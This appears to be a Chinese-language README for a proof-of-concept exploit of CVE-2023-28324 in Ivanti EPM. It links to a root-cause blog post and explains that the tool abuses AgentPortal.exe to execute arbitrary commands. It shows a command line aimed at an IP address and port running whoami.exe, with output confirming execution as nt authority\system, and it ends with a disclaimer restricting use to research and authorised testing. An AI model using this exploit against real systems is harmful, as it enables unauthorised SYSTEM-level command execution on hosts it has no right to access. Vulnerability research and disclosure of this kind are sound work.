影响 Ivanti EPM 的 CVE-2023-28324 POC。
关于该漏洞的技术根本原因分析可在我们的博客上查看: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
该 POC 利用了 AgentPortal.exe 中的一个漏洞来执行任意命令。为使此 POC 正常工作,您必须自行提供来自 Ivanti EPM 安装中的 AgentPortal.exe 和 APCommon.dll 引用。
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
本软件纯粹为学术研究和开发有效的防御技术而创建,除非得到明确授权,否则不应用于攻击系统。项目维护者不对软件的误用负责或承担任何责任。请负责任地使用。